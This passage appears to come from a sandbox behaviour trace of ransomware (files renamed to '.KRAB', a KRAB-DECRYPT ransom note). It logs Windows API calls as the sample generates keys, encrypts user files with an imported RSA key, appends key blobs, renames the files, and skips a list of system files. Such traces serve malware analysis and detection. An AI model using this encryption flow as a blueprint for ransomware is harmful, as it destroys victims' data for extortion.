CryptReleaseContext (hProv=0xfbc100, dwFlags=0x0) returned 1 [0058.469] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbbc38) returned 1 [0058.469] CryptImportKey (in: hProv=0xfbbc38, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd720) returned 1 [0058.469] CryptGetKeyParam (in: hKey=0xfbd720, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0058.469] CryptEncrypt (in: hKey=0xfbd720, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0058.470] GetLastError () returned 0x0 [0058.470] CryptDestroyKey (hKey=0xfbd720) returned 1 [0058.470] CryptReleaseContext (hProv=0xfbbc38, dwFlags=0x0) returned 1 [0058.470] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0058.473] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0058.473] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0058.473] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e7fc*=0x42132, lpOverlapped=0x0) returned 1 [0058.796] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xfffbdece, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.796] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x42132, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x42132, lpOverlapped=0x0) returned 1 [0058.797] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0058.797] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.801] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.802] CloseHandle (hObject=0x448) returned 1 [0058.814] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.814] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690.xsl.krab")) returned 1 [0058.815] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.815] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0058.815] lstrcmpW (lpString1="ISO690Nmerical.XSL", lpString2=".") returned 1 [0058.815] lstrcmpW (lpString1="ISO690Nmerical.XSL", lpString2="..") returned 1 [0058.815] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="ISO690Nmerical.XSL" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL" [0058.815] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0058.815] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL.KRAB") returned 90 [0058.816] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL") returned 85 [0058.816] lstrlenW (lpString=".XSL") returned 4 [0058.816] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0058.816] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".XSL ") returned 5 [0058.816] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.816] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL") returned 85 [0058.816] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL") returned 85 [0058.816] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="desktop.ini") returned 1 [0058.816] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="autorun.inf") returned 1 [0058.816] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="ntuser.dat") returned -1 [0058.816] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="iconcache.db") returned 1 [0058.816] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="bootsect.bak") returned 1 [0058.816] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="boot.ini") returned 1 [0058.816] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="ntuser.dat.log") returned -1 [0058.816] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="thumbs.db") returned -1 [0058.816] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="KRAB-DECRYPT.html") returned -1 [0058.817] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="KRAB-DECRYPT.txt") returned -1 [0058.817] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="CRAB-DECRYPT.txt") returned 1 [0058.817] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="ntldr") returned -1 [0058.817] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="NTDETECT.COM") returned -1 [0058.817] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="Bootfont.bin") returned 1 [0058.817] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0058.817] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbb5d8) returned 1 [0058.817] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0058.818] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0058.818] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0058.818] CryptGenRandom (in: hProv=0xfbb5d8, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0058.818] CryptReleaseContext (hProv=0xfbb5d8, dwFlags=0x0) returned 1 [0058.818] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.818] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbb990) returned 1 [0058.819] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0058.819] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0058.819] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0058.819] CryptGenRandom (in: hProv=0xfbb990, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0058.819] CryptReleaseContext (hProv=0xfbb990, dwFlags=0x0) returned 1 [0058.819] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.820] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbb4c8) returned 1 [0058.820] CryptImportKey (in: hProv=0xfbb4c8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd620) returned 1 [0058.820] CryptGetKeyParam (in: hKey=0xfbd620, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0058.820] CryptEncrypt (in: hKey=0xfbd620, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0058.820] GetLastError () returned 0x0 [0058.820] CryptDestroyKey (hKey=0xfbd620) returned 1 [0058.820] CryptReleaseContext (hProv=0xfbb4c8, dwFlags=0x0) returned 1 [0058.821] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbc210) returned 1 [0058.821] CryptImportKey (in: hProv=0xfbc210, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd5a0) returned 1 [0058.821] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0058.821] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0058.821] GetLastError () returned 0x0 [0058.821] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0058.821] CryptReleaseContext (hProv=0xfbc210, dwFlags=0x0) returned 1 [0058.822] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690nmerical.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0058.822] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0058.823] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0058.823] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e7fc*=0x351ea, lpOverlapped=0x0) returned 1 [0058.868] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xfffcae16, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.868] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x351ea, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x351ea, lpOverlapped=0x0) returned 1 [0058.869] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0058.869] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.873] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.874] CloseHandle (hObject=0x448) returned 1 [0058.877] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.878] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690nmerical.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690nmerical.xsl.krab")) returned 1 [0058.879] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.879] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0058.879] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0058.879] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0058.879] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\KRAB-DECRYPT.txt" [0058.879] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0058.879] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\KRAB-DECRYPT.txt.KRAB") returned 88 [0058.879] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\KRAB-DECRYPT.txt") returned 83 [0058.879] lstrlenW (lpString=".txt") returned 4 [0058.880] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0058.880] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0058.880] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.880] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\KRAB-DECRYPT.txt") returned 83 [0058.880] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\KRAB-DECRYPT.txt") returned 83 [0058.880] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0058.880] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0058.880] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0058.880] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0058.880] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0058.880] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0058.881] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0058.881] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0058.881] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0058.881] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0058.881] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.882] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0058.882] lstrcmpW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2=".") returned 1 [0058.882] lstrcmpW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="..") returned 1 [0058.882] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="MLASeventhEditionOfficeOnline.xsl" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl" [0058.882] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0058.882] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl.KRAB") returned 105 [0058.882] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl") returned 100 [0058.882] lstrlenW (lpString=".xsl") returned 4 [0058.882] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0058.882] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".xsl ") returned 5 [0058.883] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.883] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl") returned 100 [0058.883] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl") returned 100 [0058.883] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="desktop.ini") returned 1 [0058.883] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="autorun.inf") returned 1 [0058.883] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="ntuser.dat") returned -1 [0058.883] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="iconcache.db") returned 1 [0058.883] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="bootsect.bak") returned 1 [0058.883] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="boot.ini") returned 1 [0058.883] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="ntuser.dat.log") returned -1 [0058.883] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="thumbs.db") returned -1 [0058.883] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="KRAB-DECRYPT.html") returned 1 [0058.883] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="KRAB-DECRYPT.txt") returned 1 [0058.883] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="CRAB-DECRYPT.txt") returned 1 [0058.883] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="ntldr") returned -1 [0058.883] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="NTDETECT.COM") returned -1 [0058.883] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="Bootfont.bin") returned 1 [0058.883] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0058.884] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbb990) returned 1 [0058.884] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0058.885] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0058.885] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0058.885] CryptGenRandom (in: hProv=0xfbb990, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0058.885] CryptReleaseContext (hProv=0xfbb990, dwFlags=0x0) returned 1 [0058.885] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.885] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbbd48) returned 1 [0058.886] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0058.886] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0058.907] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0058.907] CryptGenRandom (in: hProv=0xfbbd48, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0058.907] CryptReleaseContext (hProv=0xfbbd48, dwFlags=0x0) returned 1 [0058.908] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.908] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbb770) returned 1 [0058.908] CryptImportKey (in: hProv=0xfbb770, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd3a0) returned 1 [0058.908] CryptGetKeyParam (in: hKey=0xfbd3a0, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0058.908] CryptEncrypt (in: hKey=0xfbd3a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0058.909] GetLastError () returned 0x0 [0058.909] CryptDestroyKey (hKey=0xfbd3a0) returned 1 [0058.909] CryptReleaseContext (hProv=0xfbb770, dwFlags=0x0) returned 1 [0058.909] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbc210) returned 1 [0058.909] CryptImportKey (in: hProv=0xfbc210, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd720) returned 1 [0058.910] CryptGetKeyParam (in: hKey=0xfbd720, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0058.910] CryptEncrypt (in: hKey=0xfbd720, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0058.910] GetLastError () returned 0x0 [0058.910] CryptDestroyKey (hKey=0xfbd720) returned 1 [0058.910] CryptReleaseContext (hProv=0xfbc210, dwFlags=0x0) returned 1 [0058.910] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\mlaseventheditionofficeonline.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0058.912] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0058.912] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0058.913] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e7fc*=0x3e4f3, lpOverlapped=0x0) returned 1 [0058.960] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xfffc1b0d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.960] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x3e4f3, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x3e4f3, lpOverlapped=0x0) returned 1 [0058.961] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0058.961] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.964] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.965] CloseHandle (hObject=0x448) returned 1 [0058.969] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.970] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\mlaseventheditionofficeonline.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\mlaseventheditionofficeonline.xsl.krab")) returned 1 [0058.971] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.971] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0058.971] lstrcmpW (lpString1="SIST02.XSL", lpString2=".") returned 1 [0058.971] lstrcmpW (lpString1="SIST02.XSL", lpString2="..") returned 1 [0058.971] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="SIST02.XSL" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL" [0058.971] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0058.971] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: 